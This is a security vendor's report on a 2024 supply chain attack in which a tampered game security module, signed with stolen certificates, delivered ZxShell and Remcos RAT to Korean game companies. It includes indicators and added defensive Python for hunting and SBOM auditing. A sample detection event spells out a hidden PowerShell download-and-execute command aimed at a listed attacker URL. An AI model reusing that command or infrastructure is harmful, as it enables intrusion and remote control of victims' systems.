Supply Chain Attacks on Korean Game Companies Utilizing Valid Certificates

  • Short Summary: AhnLab’s ASEC has identified supply chain attacks targeting Korean game companies by the group Larva-24008. The attackers compromised a game security module to distribute malware, primarily targeting game companies. The malware was signed with a valid certificate, allowing it to be distributed through official channels, leading to the installation of remote control malware on affected systems.
  • Key Points:
    • Supply chain attacks were identified against Korean game companies by the group Larva-24008.
    • The attackers inserted malware into a game security module, affecting games distributed through official channels.
    • Malware was signed with a valid certificate from a Korean game security company.
    • The attack occurred in April and May of 2024, targeting specific game companies.
    • Malware executed PowerShell commands to download obfuscated scripts, including Remcos RAT.
    • Stolen certificates have been used in attacks since at least 2017, affecting multiple companies.
    • Recent misuse of certificates included signing a game launcher that collected user information.
    • Supply chain attacks are increasing in frequency and pose significant risks to organizations and individuals.
    • Implementation of a Software Bill of Materials (SBOM) is suggested to enhance supply chain security.

MITRE ATT&CK TTPs – created by AI

  • Technique Name: Supply Chain Compromise (T1195)
    • Procedure: Attackers compromised a game security module to distribute malware through legitimate game installations.
  • Technique Name: Remote Access Tools (T1219)
    • Procedure: The malware installed Remcos RAT to allow remote control of infected systems.
  • Technique Name: PowerShell (T1086)
    • Procedure: The malware executed PowerShell commands to download and run obfuscated scripts from specific addresses.
  • Technique Name: Valid Accounts (T1078)
    • Procedure: Attackers used valid certificates from a Korean game security company to sign malware, allowing it to bypass security measures.

While monitoring threats against Korean companies and users, AhnLab SEcurity intelligence Center (ASEC) has recently identified evidence of supply chain attacks targeting Korean game companies. The attack group, identified by AhnLab as Larva-24008, targeted a Korean game security company to insert a malicious routine into the game security module. As a result, games using the compromised security module were distributed with malware, and systems that installed these games ultimately had remote control malware installed, giving the threat actor control of them. The attacker did not target every user of the games that bundled the tampered security module; instead, the remote control malware was primarily installed on systems identified as belonging to game companies. In other words, this is presumed to be an APT attack targeting Korean game companies.

The attack occurred in April and May of 2024, with the attacker inserting malware into a game security-related program module and distributing it using a valid certificate from the program’s developer. The distribution was carried out in the form of a supply chain attack: installing games from the official websites of Korean game companies would also install a malware strain. The code inserted by the threat actor executes PowerShell commands to download and run obfuscated scripts from specific addresses. Ultimately, if the compromised system matches a specific IP designated by the attacker, the code downloads Remcos RAT.
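The chain described above, a game security module spawning PowerShell that fetches a script from an attacker-controlled host, is also what a defender can hunt for in process-creation telemetry. The Python below is an added example and is not code from ASEC or from the report: the event records are constructed to resemble Sysmon process-creation fields (ParentImage, Image, CommandLine), the indicator list and the list of "expected" PowerShell parents are assumptions, and the host and IP blocklist is taken from the IoC section at the end of this report (refanged). The first sample event deliberately embeds one of the report's listed URLs so the IoC match is exercised.

```python
"""Hunt process-creation telemetry for PowerShell download-and-execute chains
spawned by a game or game-security module, and match contacted hosts against
the report's IoCs."""
import re
from typing import Dict, List, Tuple

# Hosts and IPs from the IoC section of this report, refanged (brackets removed).
IOC_HOSTS = {
    "cloud.xt.to", "minecraft.cdn.fbi.to", "cdn.xt.to",
    "awvsf7esh.dellrescue.com", "cdn.anydeskdns.com", "cdn.chromeupdate.me",
    "cdn.kavantivirus.xyz", "cdn.office365excel.xyz",
    "104.199.173.2", "185.158.113.101", "92.223.106.203",
}

# Assumed substrings that commonly appear in download-and-execute PowerShell
# one-liners (case-insensitive match against the command line).
PS_INDICATORS = (
    "downloadstring", "downloadfile", "invoke-webrequest", "iwr ", "iex ",
    "invoke-expression", "-enc", "-w hidden", "-windowstyle hidden",
    "frombase64string", "-ep bypass", "-executionpolicy bypass",
)

# Assumed set of parents for which a child PowerShell is routine. Anything else
# (a game module, a launcher, an installer) spawning PowerShell is unusual.
EXPECTED_PARENTS = ("explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
                    "windowsterminal.exe", "code.exe")

HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)

# Constructed sample events (not real telemetry), shaped like Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Games\ExampleGame\security\gamesec.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://cdn.xt.to/components/extension.jpg')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe Get-ChildItem C:\Users"},
    {"ParentImage": r"C:\Games\ExampleGame\launcher.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c ver"},
]


def analyze_event(ev: Dict[str, str]) -> List[str]:
    """Return the reasons an event is suspicious; an empty list means no alert."""
    image = ev["Image"].lower()
    parent = ev["ParentImage"].lower()
    cmd = ev["CommandLine"]
    cmd_l = cmd.lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return []

    reasons: List[str] = []
    if not parent.endswith(EXPECTED_PARENTS):
        reasons.append("unusual-parent:" + parent.rsplit("\\", 1)[-1])
    hits = [ind.strip() for ind in PS_INDICATORS if ind in cmd_l]
    if hits:
        reasons.append("indicators:" + ",".join(hits))
    for host in HOST_RE.findall(cmd):
        if host.lower() in IOC_HOSTS:
            reasons.append("ioc-host:" + host.lower())

    # Alert on a known-bad host, or on an unusual parent combined with
    # download/obfuscation indicators. An interactive user running
    # Invoke-WebRequest from explorer.exe alone does not alert.
    has_ioc = any(r.startswith("ioc-host") for r in reasons)
    unusual = any(r.startswith("unusual-parent") for r in reasons)
    if has_ioc or (unusual and hits):
        return reasons
    return []


def find_alerts(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Return (event index, reasons) for every event that alerts."""
    return [(i, r) for i, ev in enumerate(events) if (r := analyze_event(ev))]


if __name__ == "__main__":
    for idx, reasons in find_alerts(SAMPLE_EVENTS):
        print(f"event {idx}: {'; '.join(reasons)}")
```

The parent-process check is the part that generalises beyond this campaign: a game client, security module or launcher has no business spawning PowerShell with a download cmdlet, regardless of whether the contacted host is already on a blocklist, so the rule alerts on that combination even when the IoC list is stale.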

Figure 1. The supply chain attack flowchart using a game security program

Figure 2. Comparing a normal module and a compromised module

A notable feature of the malware strains identified in the attack cases is that they were signed with a valid certificate from a Korean game security company. The certificate exploited by the threat actor has been continuously stolen and used in attacks since at least 2017, being used to sign malware strains such as ZxShell, Mimikatz, and PrintSpoofer. ZxShell is an open-source backdoor malware that has been predominantly used by attackers based in China. According to some reports, the APT 27 attack group (known to be based in China and also referred to as BRONZE UNION, EMISSARY PANDA, Iron Tiger, and Lucky Mouse) used ZxShell signed with a valid certificate from the Chinese software development company Hangzhou Bianfeng Networking Technology for attacks [1] [2]. ASEC’s findings revealed that the case was essentially in the same form as ZxShell signed with a certificate from a Korean game company. 

However, these attacks have been ongoing for a long time, and valid certificates from numerous companies, both Korean and global, were used in them. In Korea, certificates from a game development company and a game security company were identified as being used in the attacks, and certificates from Chinese software development companies were also exploited. Based on the malware strains and C&C addresses used, the attacks appear to be primarily conducted by threat actors based in China. However, it is not confirmed whether all the attacks and malware discussed are the work of the same attacker, or whether there is a specific association with any APT group.

[1] Emissary Panda APT: Recent infrastructure and RAT analysis

[2] BRONZE PRESIDENT Targets Government Officials

Among the recent cases of misuse, there is an instance from August 2024 where a Korean game development company’s certificate was used to sign the launcher program of a game called “*** Arena.” The launcher is not a typical malware strain, but the fact that it steals various user information and uses the same C&C address as the tampered module during the update indicates that it is not just a simple game client. In other words, the stolen certificates have been used both to sign various malware strains, including ZxShell, and to sign game clients distributed globally. This suggests the possibility that the stolen certificates are being used by multiple attackers.

Country           | Signed Company | Valid (as of Sep. 27, 2024) | Description
------------------+----------------+-----------------------------+-------------------------------------------
Republic of Korea | Company A      | X                           | Game development company
Republic of Korea | Company B      | X                           | Game development company
Republic of Korea | Company C      | X                           | Game security program development company
Republic of Korea | Company D      | X                           | Game development company
Republic of Korea | Company E      | O                           | Game development company
China             | Company F      | O                           | App development company
China             | Company G      | O                           | Game development company
China             | Company H      | X                           | Software development company
China             | Company I      | X                           | Software development company
China             | Company J      | O                           | IT company

Table 1. Information on certificates exploited by the threat actor

The ZxShell used in the attack is installed as a service by a dropper. The ZxShell variants that are ultimately installed are not all identical, but they share the characteristic of having many features removed compared to the original ZxShell, providing only basic functions such as a remote shell and file management. Although the threat actor cannot use functions like keylogging, information collection, and remote desktop, the supported functions shown below are sufficient to control the infected system. The attacker also used a valid certificate from a Korean game company to sign not only ZxShell but also tools for privilege escalation and credential theft, such as Mimikatz, PrintSpoofer, and NirSoft’s Dialupass.

Command     | Function
------------+----------------
GetCMD      | Remote shell
FileMG      | File management
rPortMap    | Port forwarding
End         | Stop
Exit / Quit | Terminate

Table 2. Commands supported by ZxShell used in the attack

In a recent attack case confirmed in August 2024, the valid certificates of the game companies discussed above were not only used to sign malware but also to sign game launchers. The image below is the homepage of a game called “*** Arena,” where you can sign up and download the game client. Upon investigating the game launchers for *** Arena, it was confirmed that they were signed and distributed using valid certificates from Korean game companies.

Figure 3. Homepage of *** Arena

The *** Arena game launcher sends the following information to the threat actor’s server: user name, computer name, MAC address, IP address, and version information of hardware (CPU, GPU, RAM, motherboard, etc.) and Windows.

Figure 4. Information collected from the system

The launcher’s binary has various encrypted strings including download URLs and the commands mentioned above. These strings are decrypted during execution, and one thing to note is that some strings contain profanities. 

Figure 5. Strings identified in the game launcher

Cases of software supply chain attacks have been noticeably increasing recently. Software supply chain attacks are being observed from both state-sponsored APT groups and threat actors aiming for financial gain. If a supply chain attack is successful, its impact is significant enough to affect every organization and individual using the program. AhnLab is identifying and responding to the various software supply chain attacks that are increasing in frequency.

Supply chain attacks target the whole software infrastructure, and because an attack becomes possible wherever protection is missing at any stage, they are difficult to recognize and defend against. Even after vulnerabilities are disclosed and administrators or development companies become aware of supply chain attacks, there are many cases where appropriate action is not taken for a long time. If a Software Bill of Materials (SBOM) is implemented and governments and companies cooperate and act together, this is expected to be the first step in strengthening supply chain security and building a secure digital environment.
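One concrete way an SBOM helps in a case like this one is that every shipped component is recorded with its hash, so a tampered security module can be checked against published indicators and an unlisted or unhashed component stands out. The Python below is an added example, not code from ASEC or from the report: the SBOM document is constructed in the shape of a CycloneDX JSON file for a hypothetical game client (component names, versions and the first hash, which is the MD5 of an empty file, are placeholders), and the blocklist is the MD5 list from this report's IoC section. The second component deliberately carries one of those hashes so the match is exercised.

```python
"""Audit a CycloneDX-style SBOM: flag components whose recorded hash matches a
known-bad indicator, and components that carry no hash at all."""
import json
from typing import Dict, List, Set

# MD5 hashes from the IoC section of this report.
IOC_MD5 = {
    "00eb89ba2b658f90f8749cf7b955b97b",
    "088d9d15874c1b3d31b1fd620667c38c",
    "0c0f927daf7c20a2cc8c70bf654e15d5",
    "0da494197014edc66c64bb24a7f42d59",
    "1207ca1d7402a397daa971f2e4bef505",
}

# Constructed SBOM for a hypothetical game client. Names, versions and the first
# hash (MD5 of an empty file) are placeholders; the second component carries one
# of the report's IoC hashes (in upper case, to show matching is case-insensitive);
# the third records no hash at all.
SAMPLE_SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.5",
    "components": [
        {"type": "application", "name": "ExampleGame.exe", "version": "1.2.0",
         "hashes": [{"alg": "MD5", "content": "d41d8cd98f00b204e9800998ecf8427e"}]},
        {"type": "library", "name": "gamesec_module.dll", "version": "3.4.1",
         "hashes": [{"alg": "MD5", "content": "00EB89BA2B658F90F8749CF7B955B97B"}]},
        {"type": "library", "name": "audio.dll", "version": "2.0.0"},
    ],
})


def audit_sbom(sbom_json: str, ioc_md5: Set[str] = IOC_MD5) -> Dict[str, List[str]]:
    """Return names of components matching an IoC hash and of components with no hash."""
    bom = json.loads(sbom_json)
    matches: List[str] = []
    missing: List[str] = []
    for comp in bom.get("components", []):
        name = comp.get("name", "<unnamed>")
        hashes = comp.get("hashes", [])
        if not hashes:
            # A component without any recorded hash cannot be verified at all.
            missing.append(name)
            continue
        md5s = [h["content"].lower() for h in hashes if h.get("alg", "").upper() == "MD5"]
        if any(h in ioc_md5 for h in md5s):
            matches.append(name)
    return {"ioc_matches": matches, "missing_hashes": missing}


if __name__ == "__main__":
    print(json.dumps(audit_sbom(SAMPLE_SBOM), indent=2))
```

MD5 is used here only because that is what the report publishes; an SBOM intended for integrity checking should record SHA-256 alongside it, since MD5 collisions are practical and an attacker controlling the build could otherwise ship a tampered module that still matches the recorded hash.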

MD5

00eb89ba2b658f90f8749cf7b955b97b
088d9d15874c1b3d31b1fd620667c38c
0c0f927daf7c20a2cc8c70bf654e15d5
0da494197014edc66c64bb24a7f42d59
1207ca1d7402a397daa971f2e4bef505

URL

http[:]//cloud[.]xt[.]to/uploads/09/30/xs[.]bin
http[:]//minecraft[.]cdn[.]fbi[.]to/launcher/cache/new/ipchecker[.]bin
http[:]//minecraft[.]cdn[.]fbi[.]to/launcher/cache/new/xs[.]bin
http[:]//minecraft[.]cdn[.]fbi[.]to/launcher/files/hashfiles[.]bin
https[:]//cdn[.]xt[.]to/components/extension[.]jpg

FQDN

awvsf7esh[.]dellrescue[.]com
cdn[.]anydeskdns[.]com
cdn[.]chromeupdate[.]me
cdn[.]kavantivirus[.]xyz
cdn[.]office365excel[.]xyz

IP

104[.]199[.]173[.]2
185[.]158[.]113[.]101
92[.]223[.]106[.]203

Source : https://asec.ahnlab.com/en/83693/